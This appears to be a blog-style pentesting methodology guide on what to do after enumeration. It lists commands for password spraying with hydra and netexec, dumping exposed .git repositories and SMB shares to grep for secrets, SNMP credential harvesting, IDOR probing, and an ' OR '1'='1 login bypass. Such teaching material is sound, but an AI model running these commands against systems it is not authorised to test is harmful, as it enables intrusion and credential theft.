- The Mindset Shift
- The Post-Enumeration Flow
- Finding by Finding β What To Do Next
- Prioritization β What to Try First
- Want to Go Deeper?
You've run the scans. You've checked every port. You've enumerated the web server, dug into DNS, checked SMB, analyzed the JavaScript files, and fuzzed the parameters. Now you have a list of findings. The question everyone asks at this point β what do I actually do with all of this?
This is where enumeration ends and exploitation begins.
Enumeration is intelligence gathering. You've been building a picture of the target β what's there, how it's configured, what version it's running, what's accessible.
Now you shift from "what is here?" to "what can I do with what I found?"
Every finding from enumeration maps to a next action. Nothing you found is useless β even dead ends tell you something. Here's how to work through everything systematically.
Enumeration finding
β
Categorize β what type of finding is this?
β
Research β what does this version/misconfiguration allow?
β
Exploit or Escalate
β
Document
# Research the version
searchsploit <service> <version>
# Visit: https://exploit-db.com
# Visit: https://nvd.nist.gov
# Google: "<service> <version> CVE"Every version number is a potential CVE. Copy the exact version string nmap gave you and search it. If a public exploit exists β read it carefully before running it.
- Try default credentials first β always
- Common defaults:
admin/admin,admin/password,root/root,guest/guest - Check if the login page leaks the technology β "Powered by WordPress" means try
admin/adminon/wp-login.php - Test for SQL injection: enter
' OR '1'='1in the username field - Check the page source for hints, hidden fields, commented-out credentials
- Download everything accessible
- Look for:
.zip,.tar,.sql,.bak,.config,.env,.key - Any database backup is extremely high value β often contains credentials
- Any
.envfile almost certainly contains credentials - Any SSH key files β use them immediately
# Download everything recursively
wget -r http://<target>/backup/# Dump the entire repository
git-dumper http://<target>/.git/ ./dumped-repo
# Search the history for credentials
cd dumped-repo
git log --oneline
git log -p | grep -iE "(password|secret|key|token)"# Connect and download everything
smbclient //<target>/ShareName -N
smb: \> mget *
# Search downloaded files for credentials
grep -rE "(password|passwd|secret|key)" ./downloaded-files/Build a username list and test credentials across every service:
# Create username file
echo "jsmith" >> users.txt
echo "admin" >> users.txt
echo "john.smith" >> users.txt
# Password spray SSH
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt ssh://<target>
# Password spray SMB
netexec smb <target> -u users.txt -p 'Password123' --continue-on-success
# Check password policy first β avoid lockouts
enum4linux-ng -A <target> | grep -i "password policy"Test them everywhere β credential reuse is one of the most common paths to access:
# SSH
ssh username@<target>
# SMB
smbclient //<target>/C$ -U username
# FTP
ftp <target>
# Web login pages
# Try manually in browser
# Database
mysql -u username -p -h <target># Add to /etc/hosts
echo "<ip> subdomain.example.com" >> /etc/hosts
# Enumerate it like a fresh target
gobuster dir -u http://subdomain.example.com \
-w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt \
-x php,html,txt \
-t 50# Full walk β save everything
snmpwalk -v2c -c public <target> > snmp-full.txt
# Search for credentials in process list
grep -iE "(password|passwd|secret)" snmp-full.txt
# Get user list for password spraying
snmpwalk -v2c -c public <target> 1.3.6.1.4.1.77.1.2.25# Test for unauthenticated access
curl -s http://<target>/api/v1/users
curl -s http://<target>/api/v1/admin
# Fuzz for parameters
arjun -u http://<target>/api/v1/users
# Test for IDOR β change IDs
curl -s http://<target>/api/v1/users/1
curl -s http://<target>/api/v1/users/2
# Test JWT if present
jwt_tool <token>Not all findings are equal. Here's how to prioritize:
| Priority | Finding | Why |
|---|---|---|
| π΄ Critical | Default credentials that work | Immediate access |
| π΄ Critical | Public exploit for identified version | Direct path to RCE |
| π΄ Critical | Credentials found in files | Try everywhere |
| π High | SQL injection on login form | Authentication bypass |
| π High | Exposed .env or config files |
Credential extraction |
| π High | Accessible SMB shares | File access, credential hunting |
| π‘ Medium | Username list | Enables credential attacks |
| π‘ Medium | Old software versions | Research required |
| π’ Low | Technology stack identified | Informs attack direction |
Enumeration is the foundation. Here is where the series goes next:
| Resource | What It Covers |
|---|---|
| nmap-reference | Complete nmap flag, scan, and NSE reference β go deeper on scanning |
| google-dorking | OSINT, passive recon, finding exposed assets before you scan anything |
| exploitation-reference | Coming soon β what to do once enumeration gives you a foothold π |
You found the services. You mapped the surface. Now you figure out which door opens.
by SudoChef Β· Part of the SudoCode Pentesting Methodology Guide